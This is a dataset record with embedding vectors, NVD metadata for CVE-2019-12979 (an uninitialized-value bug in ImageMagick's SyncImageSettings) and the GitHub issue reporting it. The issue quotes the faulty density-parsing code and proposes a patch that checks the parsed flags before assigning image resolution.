0.002796390326693654, 0.007717811968177557, -0.006070442497730255, 0.009470492601394653, 0.013713032007217407, 0.009681114926934242, 0.004769096150994301, -0.022867590188980103, 0.019964007660746574, -0.002497381530702114, 0.004039439372718334, -0.008304545655846596, -0.019287006929516792, -0.025996839627623558, -0.004039439372718334, 0.010516082867980003, 0.004859363194555044, -0.01144883967936039, 0.008898802101612091, 0.0003521345788612962, -0.015390490181744099, 0.029727868735790253, 0.005337025038897991, 0.014412599615752697, -0.006235931999981403, -0.03026946820318699, 0.015586068853735924, 0.021032165735960007, -0.0035824638325721025, 0.03682885691523552, -0.012155929580330849, -0.003114204853773117, -0.02270210161805153, -0.02160385623574257, -0.0023412953596562147, -0.020866677165031433, -0.022145455703139305, -0.0024654120206832886, -0.03902534767985344, -0.0057733142748475075, 0.012900630943477154, 0.025500372052192688, 0.0024654120206832886, 0.021829523146152496, 0.0037141030188649893, 0.0031743827275931835, 0.00032016506884247065, 0.01214840728789568, 0.007495905738323927, 0.018459562212228775, -0.02049056440591812, 0.00121954211499542, 0.026643751189112663, -0.01681971549987793, -0.016293158754706383, 0.05244501307606697, 0.018038315698504448, 0.011824951507151127, 0.004009350668638945, 0.0160073135048151, 0.01862505078315735, 0.005882387049496174, -0.007793034426867962, -0.005468663759529591, 0.03174382820725441, -0.010350593365728855, -0.005164013709872961, 0.019873742014169693, -0.012832931242883205, 0.0036858946550637484, 0.007631306070834398, 0.0026910791639238596, 0.0019444974604994059, -0.016955114901065826, -0.009124469943344593, -0.016759537160396576, -0.008770924992859364, 0.015142256394028664, -0.02548532746732235, -0.013464798219501972, 0.01333692017942667, -0.0015589829999953508, 0.006559387780725956, 0.00564919738098979, 0.0030239380430430174, 0.025003904476761818, -0.018459562212228775, -0.009079336188733578, 0.005904953461140394, -0.006551865488290787, 0.012629830278456211, 0.019271962344646454, 0.015706423670053482, -0.006751204840838909, -0.0055250804871320724, -0.00886119157075882, 0.028599532321095467, -0.004483251366764307, 0.003178143873810768, 0.01313382014632225, 0.002243506256490946, 0.008620480075478554, 0.0035128830932080746, 0.00865056924521923, 0.011155473068356514, 0.017256004735827446, 0.006581954658031464, -0.0024560093879699707, 0.0006342183332890272, 0.0035486137494444847, -0.011509018018841743, -0.01020014937967062, -0.010681572370231152, 0.001357763190753758, -0.01760202646255493, -0.0037103418726474047, -0.01701529324054718, -0.008958980441093445, -0.003900278126820922, -0.020445430651307106, -0.007770467549562454, 0.005276847165077925, 0.022325990721583366, -0.01830911636352539, 0.006476643495261669, -0.007146121934056282, -0.003055907553061843, 0.001023964025080204, 0.00940279196947813, -0.004204928874969482, -0.025334883481264114, 0.009447925724089146, -0.0016182205872610211, 0.007762945257127285, 0.010425816290080547, 0.0019651835318654776, -0.020941898226737976, 0.014909067191183567, -0.015337835066020489, -0.011975396424531937, -0.018790539354085922, -0.019437452778220177, -0.019241873174905777, -0.005540125072002411, 0.032887205481529236, 0.006578193511813879, 0.01384091004729271, -0.023619813844561577, -0.0030295797623693943, -0.003967978525906801, 0.0005209146765992045, -0.010365637950599194, -0.019648075103759766, 0.00975633691996336, 0.00940279196947813, 0.00217580609023571, 0.01969320885837078, -0.01701529324054718, -0.007405639160424471, 0.008816057816147804, -0.011155473068356514, -0.008289502002298832, -0.013276742771267891, -0.018925940617918968, 0.006156948395073414, 0.0040206341072916985, -0.0011001266539096832, -0.028734933584928513, 0.012133362703025341, 0.01144883967936039, -0.005434813909232616, -0.003309782827273011, -0.00021732204186264426, 0.004204928874969482, 0.005017329938709736, -0.0042951954528689384, -0.008891280740499496, 0.02398088201880455, 0.01999409683048725, 0.016187846660614014, -0.0008420200319960713, 0.0010578141082078218, 0.03451200947165489, -0.004863124340772629, 0.01990383118391037, 0.005431052763015032, -0.024627793580293655, 0.011140428483486176, 0.009726248681545258, 0.011531583964824677, 0.019046295434236526, -0.014773666858673096, 0.012915675528347492, 0.021859610453248024, 0.009101903066039085, 0.0028264792636036873, 0.03406067565083504, -0.00901163648813963, 0.015886956825852394, -0.02121269889175892, -0.004517101217061281, -0.006465360056608915, -0.00028749037301167846, 0.005393441766500473, -0.03601645678281784, 0.002267953474074602, 0.003285335609689355, 0.01730113849043846, -0.00032486647251062095, -0.0023168479092419147, -0.002399592660367489, 0.03126240521669388, 0.0059312814846634865, -0.017466627061367035, 0.008470035158097744, -0.016774581745266914, 0.0011546629248186946, 0.0032195160165429115, 0.016970159485936165, 0.007601217366755009, 0.008921368978917599, -0.0016153997275978327, -0.011757251806557178, 0.009824037551879883, -0.0009167722309939563, -0.016187846660614014, -0.011260784231126308, -0.0016370260855183005, -0.011162995360791683, 0.014721011742949486, 0.009289958514273167, 0.012923197820782661, -0.006510493345558643, 0.02856944315135479, 0.019964007660746574, 0.009575803764164448, -0.0016548914136365056, -0.0070897052064538, 0.009951915591955185, 0.028103064745664597, 0.011576717719435692, -0.011712118051946163, -0.01632324792444706, 0.003379363566637039, 0.006386376451700926, -0.002273595193400979, -0.0160073135048151, 0.00629610987380147, -0.011757251806557178, -0.007661395240575075, 0.031894270330667496, 0.011877607554197311, -0.01060634944587946, 0.03225533664226532, -0.011922740377485752, 0.00246353168040514, -0.027215441688895226, -0.01791796088218689, 0.011606806889176369 ]
343
CVE-2019-12979
2019-06-26T18:15:10.417000
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1522" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1522
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is an issue in function SyncImageSettings in MagickCore/image.c. The issue is similar to https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6385 which was fixed in https://github.com/ImageMagick/ImageMagick/commit/56a19e7ae07f40299f3afd4994d690f2c9b81993. ``` if (image_info->density != (char *) NULL) { GeometryInfo geometry_info; flags=ParseGeometry(image_info->density,&geometry_info); image->resolution.x=geometry_info.rho; image->resolution.y=geometry_info.sigma; if ((flags & SigmaValue) == 0) image->resolution.y=image->resolution.x; } ``` Below is the proposal patch. ``` - image->resolution.x=geometry_info.rho; - image->resolution.y=geometry_info.sigma; - if ((flags & SigmaValue) == 0) - image->resolution.y=image->resolution.x; + if ((flags & RhoValue) != 0) + image->resolution.x=geometry_info.rho; + image->resolution.y=image->resolution.x; + if ((flags & SigmaValue) != 0) + image->resolution.y=geometry_info.sigma; ```
Use-of-uninitialized-value in function SyncImageSettings.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1522/comments
5
2019-03-21T11:58:29
2019-08-10T06:30:27Z
https://github.com/ImageMagick/ImageMagick/issues/1522
423,694,012
1,522
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Use-of-uninitialized-value in function SyncImageSettings. Issue date: --- start body --- ### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is an issue in function SyncImageSettings in MagickCore/image.c. The issue is similar to https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6385 which was fixed in https://github.com/ImageMagick/ImageMagick/commit/56a19e7ae07f40299f3afd4994d690f2c9b81993. ``` if (image_info->density != (char *) NULL) { GeometryInfo geometry_info; flags=ParseGeometry(image_info->density,&geometry_info); image->resolution.x=geometry_info.rho; image->resolution.y=geometry_info.sigma; if ((flags & SigmaValue) == 0) image->resolution.y=image->resolution.x; } ``` Below is the proposal patch. ``` - image->resolution.x=geometry_info.rho; - image->resolution.y=geometry_info.sigma; - if ((flags & SigmaValue) == 0) - image->resolution.y=image->resolution.x; + if ((flags & RhoValue) != 0) + image->resolution.x=geometry_info.rho; + image->resolution.y=image->resolution.x; + if ((flags & SigmaValue) != 0) + image->resolution.y=geometry_info.sigma; ``` --- end body ---
1,728
[ -0.03209313005208969, 0.04295886680483818, -0.003528564004227519, 0.03164505586028099, 0.01354716531932354, 0.039626333862543106, -0.0256941057741642, 0.043602969497442245, -0.033801402896642685, -0.00677358265966177, 0.004967293702065945, 0.010326649993658066, 0.019225072115659714, 0.02138141728937626, -0.01197891402989626, 0.027010316029191017, -0.01879100315272808, 0.020625296980142593, -0.04741157591342926, -0.03430548310279846, 0.014128257520496845, -0.0038331125397235155, -0.03553767874836922, 0.027024319395422935, -0.01506640762090683, 0.010606694966554642, -0.007820249535143375, 0.008373337797820568, 0.042454786598682404, -0.01704072393476963, 0.03758200630545616, 0.001042291522026062, 0.033465348184108734, 0.000618286314420402, 0.04309888929128647, -0.02101735956966877, 0.035453666001558304, 0.05908944457769394, 0.011488836258649826, 0.0308329276740551, -0.017894860357046127, -0.06116177514195442, -0.00882141012698412, 0.031000955030322075, -0.023635776713490486, -0.015192427672445774, -0.025960149243474007, -0.00208808365277946, -0.026940304785966873, -0.001163935987278819, 0.026702268049120903, -0.029376694932579994, 0.003266021842136979, -0.028578566387295723, -0.013246117159724236, -0.02825651504099369, 0.01974315568804741, 0.044191062450408936, 0.02229156158864498, 0.003948631230741739, -0.013911223039031029, 0.02475595660507679, -0.0017222752794623375, -0.001092174556106329, 0.008366337046027184, 0.012216952629387379, -0.012637019157409668, 0.0018640479538589716, -0.01173387560993433, 0.004897282458841801, -0.0070886327885091305, -0.02030324563384056, 0.03755400329828262, 0.042678821831941605, 0.024923983961343765, -0.0039871372282505035, 0.03293326497077942, 0.005513381212949753, -0.026534240692853928, -0.012868056073784828, -0.03198111057281494, 0.029012637212872505, -0.024125855416059494, 0.04962392896413803, 0.0319531075656414, -0.019911181181669235, 0.010088612325489521, -0.057745229452848434, -0.002271863166242838, 0.032989270985126495, -0.009549526497721672, -0.009353495202958584, 0.011411823332309723, -0.012223953381180763, -0.010620697401463985, 0.02380380406975746, 0.013211111538112164, -0.019533121958374977, -0.04494718462228775, -0.01501039881259203, -0.034277476370334625, -0.020849332213401794, -0.011880898848176003, 0.021199388429522514, 0.02381780557334423, 0.03385741263628006, 0.014968392439186573, -0.037666019052267075, 0.0274443868547678, 0.12658022344112396, -0.0006756079965271056, -0.01776883937418461, -0.008394341915845871, -0.004053647629916668, -0.012048925273120403, 0.02335573174059391, 0.007967273704707623, -0.00437919981777668, -0.021563446149230003, -0.022809645161032677, -0.030076807364821434, -0.008401342667639256, -0.0158645361661911, 0.010879738256335258, -0.03612577170133591, 0.036377813667058945, 0.001070296042598784, -0.03441749885678291, -0.013190108351409435, 0.006332512013614178, -0.023033680394291878, -0.010312648490071297, 0.003311529289931059, -0.010053606703877449, -0.004368698224425316, -0.019239075481891632, -0.030048802495002747, 0.043518953025341034, -0.009773561730980873, 0.006784084253013134, -0.04074651002883911, -0.024825967848300934, 0.03690989688038826, 0.005747918505221605, -0.014289283193647861, 0.0001946092233993113, -0.027724429965019226, -0.010256638750433922, 0.0019620636012405157, 0.007673226296901703, -0.03690989688038826, -0.013211111538112164, 0.01669066771864891, -0.008506359532475471, 0.0634581446647644, 0.007624218240380287, 0.016172584146261215, 0.031028958037495613, -0.004599735140800476, -0.0004957667551934719, -0.0005158949643373489, -0.017082730308175087, 0.0018360434332862496, 0.015682505443692207, 0.02509200945496559, -0.014590331353247166, -0.030636895447969437, 0.024447906762361526, -0.012602013535797596, 0.028788600116968155, 0.016200589016079903, -0.009633539244532585, -0.012798044830560684, 0.0042916857637465, -0.03623779118061066, -0.01530444622039795, -0.004953291732817888, 0.0025904139038175344, 0.032065123319625854, -0.04553527757525444, -0.01891702227294445, -0.03688189387321472, -0.016438627615571022, -0.0023786302190274, 0.023873815312981606, -0.013281122781336308, -0.02310369163751602, 0.026660259813070297, 0.004764261189848185, -0.013099092990159988, 0.026786280795931816, -0.005033804569393396, 0.03234516829252243, 0.020121214911341667, 0.009430507197976112, 0.00654254574328661, -0.0338854156434536, -0.07118737697601318, 0.0027024319861084223, -0.02512001432478428, 0.021227393299341202, -0.0003008293278981, -0.02392982505261898, -0.017684826627373695, -0.03125299513339996, 0.003238017437979579, 0.009003438986837864, 0.008765400387346745, 0.011677865870296955, -0.03363337367773056, -0.03447350859642029, -0.0634581446647644, 0.017012719064950943, 0.022557605057954788, -0.009472513571381569, 0.00630800798535347, 0.004585732705891132, 0.04377099499106407, -0.009192469529807568, 0.012181947007775307, 0.005362857133150101, -0.036601848900318146, -0.01074671745300293, -0.013785202987492085, -0.021927503868937492, -0.014576329849660397, 0.003281774464994669, -0.002299867570400238, -0.06004159525036812, 0.015920544043183327, 0.0016067568212747574, -0.02813049592077732, 0.02556808665394783, 0.007470193784683943, 0.0038401137571781874, -0.05102415382862091, -0.008534363470971584, -0.008387340232729912, -0.054944779723882675, 0.004134160466492176, -0.0013800956076011062, 0.016046565026044846, -0.005275343079119921, -0.022571606561541557, 0.042790837585926056, 0.00840834341943264, -0.030300842598080635, 0.00985757540911436, -0.0029159660916775465, 0.03606976568698883, -0.010501678101718426, -0.0028704586438834667, -0.027850450947880745, -0.0024888976477086544, -0.00622049393132329, -0.030524877831339836, -0.02184349112212658, 0.004918286111205816, -0.016172584146261215, -0.025666100904345512, 0.039318282157182693, 0.004036144819110632, 0.003435799153521657, 0.008485356345772743, 0.017208749428391457, -0.00443520862609148, -0.010487675666809082, -0.008457351475954056, -0.019827168434858322, -0.06401823461055756, 0.05032404139637947, -0.034977588802576065, -0.039178259670734406, -0.019561126828193665, -0.004704752005636692, -0.0048062680289149284, -0.005593894049525261, 0.03786205127835274, -0.003234516829252243, -0.012651021592319012, -0.007435188163071871, 0.038954224437475204, -0.004498218651860952, 0.005737416911870241, 0.027416381984949112, 0.026338208466768265, -0.006633560173213482, -0.023075688630342484, -0.04685148596763611, 0.0014798614429309964, 0.0037420981097966433, 0.007575210649520159, -0.013855214230716228, 0.0061889891512691975, 0.025484072044491768, -0.0037210946902632713, 0.011887899599969387, -0.016956709325313568, -0.05992957577109337, 0.009549526497721672, -0.010963751934468746, -0.03985036909580231, -0.006181987933814526, -0.021675463765859604, -0.02531604655086994, 0.01718074642121792, 0.0038051081355661154, -0.007911263965070248, -0.020037202164530754, -0.039654336869716644, 0.020835328847169876, -0.003118998371064663, 0.026716269552707672, -0.04270682483911514, 0.00040694003109820187, -0.019645139575004578, -0.02300567738711834, -0.010550686158239841, 0.014422304928302765, 0.01360317412763834, -0.06429827213287354, -0.01454832497984171, -0.01858096942305565, 0.026562245562672615, 0.023061685264110565, 0.01998119242489338, -0.004750259220600128, 0.04259480535984039, -0.03469754382967949, 0.0016312607331201434, -0.017460789531469345, -0.0038926221895962954, -0.009731555357575417, -0.019239075481891632, 0.04435908794403076, -0.02077932097017765, 0.004508720710873604, 0.03237317502498627, 0.02476995810866356, -0.003183758817613125, -0.009094453416764736, -0.024909980595111847, 0.01207693014293909, -0.039066243916749954, 0.007750238757580519, -0.02920866757631302, -0.01471635140478611, -0.021535441279411316, 0.020107213407754898, -0.02720634825527668, 0.0008235066197812557, 0.018426945433020592, 0.005775922909379005, -0.005702411290258169, 0.011390820145606995, -0.0015988805098459125, -0.018594970926642418, -0.012602013535797596, 0.017096731811761856, -0.005030303727835417, 0.02696830965578556, -0.0557849146425724, -0.0037701025139540434, -0.00221760431304574, 0.004676747601479292, 0.019113054499030113, 0.013351134024560452, -0.007806247565895319, 0.01028464362025261, -0.003449801355600357, -0.0203312486410141, 0.046543437987565994, -0.03632180392742157, 0.014982393942773342, -0.0406624972820282, -0.0013013329589739442, 0.011334811337292194, 0.003409544937312603, -0.02031724713742733, 0.033213306218385696, -0.0038926221895962954, 0.030160820111632347, 0.03259721025824547, -0.030384855344891548, 0.03797406703233719, 0.029796762391924858, -0.007337172515690327, 0.020723311230540276, 0.00022884907957632095, -0.015696508809924126, -0.05757720023393631, 0.020247235894203186, -0.01811889559030533, -0.020947348326444626, -0.011306807398796082, 0.053768593817949295, -0.03209313005208969, -0.04281884431838989, 0.030664900317788124, -0.01149583701044321, 0.017950868234038353, -0.048391733318567276, 0.002130090491846204, -0.015486475080251694, 0.02170346863567829, 0.028676582500338554, -0.02299167402088642, -0.026926303282380104, 0.018482953310012817, -0.017670823261141777, 0.0027706928085535765, 0.007883260026574135, 0.0005950951017439365, 0.005397862754762173, 0.05592493712902069, 0.027066325768828392, -0.04738357290625572, 0.0223055649548769, -0.06793885678052902, -0.0071236384101212025, -0.0037736031226813793, -0.021325407549738884, -0.01349115651100874, 0.027710428461432457, 0.042230747640132904, -0.014177265577018261, -0.03408144786953926, 0.024111853912472725, 0.050856128334999084, -0.019435105845332146, -0.05127619579434395, -0.011481834575533867, 0.020611293613910675, 0.004774763248860836, -0.011971913278102875, -0.02441990189254284, -0.01104076486080885, -0.017894860357046127, -0.020499275997281075, -0.02287965640425682, 0.015164423733949661, 0.026100171729922295, -0.02065329998731613, -0.017922865226864815, -0.0025659101083874702, -0.02521803043782711, 0.001085173455066979, 0.005842433776706457, -0.04181068018078804, -0.02006520703434944, -0.01949111558496952, 0.01858096942305565, -0.012244956567883492, -0.035901736468076706, 0.012454990297555923, -0.005712912883609533, -0.024083849042654037, -0.02617018297314644, 0.005719914101064205, 0.00824031699448824, 0.007183148059993982, 0.03324131295084953, -0.026814285665750504, -0.03441749885678291, 0.03494958579540253, 0.011138780042529106, 0.0019673143979161978, 0.010795725509524345, 0.014051245525479317, -0.003591574029996991, -0.011075770482420921, 0.0003999389009550214, 0.03231716528534889, 0.03492157906293869, -0.011677865870296955, 0.01960313320159912, -0.01905704475939274, 0.0008217563154175878, 0.03326931595802307, -0.056709062308073044, 0.01196491252630949, -0.02943270280957222, -0.030636895447969437, 0.01587853766977787, 0.036265794187784195, 0.009542524814605713, 0.025862133130431175, -0.002142342273145914, -0.04038245230913162, 0.02663225680589676, 0.01215394213795662, 0.030860932543873787, -0.016844691708683968, -0.04556328058242798, 0.006255499552935362, 0.008597373962402344, -0.04435908794403076, -0.009430507197976112, 0.0522843562066555, -0.009059447795152664, 0.010291644372045994, 0.008506359532475471, 0.029712747782468796, 0.006476034875959158, 0.01265802327543497, -0.013407142832875252, -0.005737416911870241, -0.029628735035657883, -0.0024836468510329723, -0.006962612736970186, 0.01880500465631485, -0.0275564044713974, 0.028662580996751785, -0.05654103681445122, 0.016844691708683968, -0.007596213836222887, 0.009871577844023705, -0.03791806101799011, 0.02068130485713482, 0.006833091843873262, -0.03312929347157478, -0.018664982169866562, 0.04374299198389053, 0.038254112005233765, 0.03119698539376259, 0.007081631571054459, 0.003644082462415099, -0.018300924450159073, -0.0024958988651633263, -0.026324206963181496, -0.01718074642121792, -0.004158664494752884, -0.0058739385567605495, 0.01928108185529709, -0.004676747601479292, 0.03184108808636665, 0.00021605014626402408, -0.010508679784834385, -0.0382821187376976, -0.0027619414031505585, -0.01669066771864891, 0.018524959683418274, -0.03971034660935402, -0.01786685548722744, 0.007407183758914471, 0.02884460985660553, -0.019785162061452866, 0.036041758954524994, -0.001006410806439817, -0.0009302736725658178, 0.019071048125624657, -0.010081611573696136, -0.014212271198630333, 0.009136459790170193, -0.005093313753604889, 0.00487277889624238, 0.0063395132310688496, -0.009080450981855392, 0.006115477532148361, 0.0037946063093841076, 0.022123536095023155, -0.0029702247120440006, 0.0341094508767128, 0.011005759239196777, 0.01063469983637333, -0.013456150889396667, -0.014114256016910076, 0.015332450158894062, -0.03993438184261322, -0.04119458422064781, 0.038926221430301666, 0.004386201035231352, 0.02114337868988514, -0.013435146771371365, -0.009773561730980873, -0.01530444622039795, 0.004316189792007208, -0.023915821686387062, -0.0014396050246432424, -0.003287025261670351, 0.024671941995620728, -0.027486393228173256, 0.002004070207476616, 0.017222752794623375, 0.01692870631814003, -0.012013919651508331, 0.007316169328987598, -0.013015080243349075, 0.01751679927110672, -0.007743237540125847, 0.010235635563731194, 0.015402461402118206, -0.012433987110853195, 0.019701149314641953, 0.018748996779322624, 0.0015244936803355813, 0.005901943426579237, -0.0042636813595891, 0.036741871386766434, -0.012581010349094868, -0.03237317502498627, 0.0003644957614596933, -0.0010536684421822429, -0.009430507197976112, -0.03035685047507286, 0.00882141012698412, -0.02194150723516941, 0.02381780557334423, -0.005135320592671633, -0.0008112546638585627, 0.009332491084933281, 0.005229835864156485, 0.03161705285310745, -0.009661544114351273, -0.000575404439587146, -0.0059789554215967655, -0.002228106139227748, 0.018006877973675728, -0.021563446149230003, 0.012475993484258652, 0.03959832713007927, -0.05231235921382904, -0.011103774420917034, 0.008401342667639256, 0.0085273627191782, 0.009983595460653305, -0.007652223110198975, 0.0029579726979136467, -0.011572849936783314, -0.03794606402516365, -0.028214508667588234, 0.010403662919998169, 0.012377978302538395, -0.012510999105870724, 0.004578731954097748, 0.030048802495002747, 0.02509200945496559, -0.011222793720662594, -0.012167944572865963, 0.00458223232999444, -0.00010594661580398679, -0.006038465071469545, -0.02359377034008503, 0.010718712583184242, -0.02988077513873577, -0.010767720639705658, 0.009724553674459457, 0.0084713539108634, -0.00455072708427906, 0.029348690062761307, -0.04052247479557991, -0.019449107348918915, -0.008982435800135136, 0.02089133858680725, 0.03363337367773056, 0.0005618397844955325, 0.01454832497984171, 0.028872614726424217, -0.01811889559030533, -0.029964787885546684, 0.004463213495910168, -0.002345374785363674, -0.018847012892365456, -0.00859037321060896, -0.00024350766034331173, 0.01986917480826378, -0.003568820422515273, -0.011852893978357315, 0.04777563363313675, 0.0049217864871025085, 0.0011621856829151511, -0.014261279255151749, 0.02170346863567829, 0.03679788112640381, 0.011985915713012218, -0.027990473434329033, 0.012104934081435204, -0.0190290417522192, -0.003502309788018465, 0.03786205127835274, 0.01834293082356453, -0.0039346287958323956, 0.022109532728791237, -0.004050147254019976, -0.0009399002301506698, -0.0015043654711917043, 0.0018570467364042997, 0.011397821828722954, 0.01256000716239214, -0.013876217417418957, 0.021171383559703827, 0.0070536271668970585, 0.00993458740413189, 0.010830731131136417, 0.02780844457447529, 0.015570488758385181, -0.008303326554596424, 0.02266962267458439, -0.014352293685078621, -0.00806528888642788, -0.050380051136016846, 0.013162103481590748, -0.006819089874625206, 0.01915506087243557, -0.018132897093892097, 0.03982236236333847, 0.0050968145951628685, -0.004281184170395136, -0.014380298554897308, -0.0352296307682991, -0.028228512033820152, -0.0032310164533555508, -0.04749558866024017, 0.00789026077836752, -0.010830731131136417, 0.0035058101639151573, -0.019701149314641953, -0.012069929391145706, -0.029264677315950394, 0.003145252587273717, -0.016382617875933647, 0.002994728507474065, -0.04248278960585594, -0.04136260971426964, 0.01541646383702755, 0.00255190790630877, 0.015318447723984718, -0.004764261189848185, -0.011908902786672115, 0.017810845747590065, -0.028326526284217834, -0.007232155650854111, 0.02848055213689804, 0.00041569143650121987, 0.0002907652233261615, 0.004897282458841801, 0.011103774420917034, 0.009136459790170193, 0.028816604986786842, -0.0029632234945893288, 0.012854054570198059, 0.009409504011273384, 0.017334770411252975, -0.019939186051487923, -0.009059447795152664, -0.029124654829502106, 0.021185385063290596, -0.004858776461333036, -0.01138381939381361, 0.04122258722782135, 0.011250797659158707, 0.00677358265966177, 0.034613531082868576, -0.027486393228173256, -0.017544804140925407, -0.010186627507209778, 0.022263558581471443, -0.022473592311143875, -0.00027479391428641975, -0.009927586652338505, 0.004809768870472908, -0.032177142798900604, 0.0004668871115427464, 0.021409422159194946, 0.03399743139743805, 0.012048925273120403, 0.004795766435563564, 0.00887041725218296, 0.020625296980142593, 0.0057059116661548615, 0.03419346362352371, -0.01775483787059784, -0.020457269623875618, -0.009171465411782265, -0.0027496893890202045, 0.009024442173540592, -0.03161705285310745, -0.013386139646172523, 0.025554083287715912, 0.025428064167499542, 0.01530444622039795, -0.003462053369730711, -0.04869978129863739, 0.021409422159194946, 0.044079042971134186, -0.008317328989505768, 0.009227474220097065, 0.004774763248860836, -0.03564969822764397, 0.0006896101986058056, 0.003966134041547775, -0.01832892931997776, 0.03612577170133591, -0.013092092238366604, 0.023509757593274117, -0.03304528072476387, -0.0059614526107907295, 0.005180827807635069, 0.004134160466492176, -0.05617697909474373, 0.007974274456501007, 0.02009321190416813, -0.00636751763522625, -0.03049687296152115, -0.013876217417418957, -0.031112972646951675, -0.02523203194141388, 0.014968392439186573, -0.009864576160907745, 0.020933344960212708, 0.01785285398364067, 0.014744356274604797, 0.022963669151067734, -0.013764199800789356, -0.003507560584694147, -0.008506359532475471, 0.00682959146797657, 0.001142057473771274, 0.0042916857637465, 0.037413980811834335, -0.02695430815219879, 0.0013704689918085933, 0.0015682505909353495, -0.02720634825527668, -0.003047236939892173, 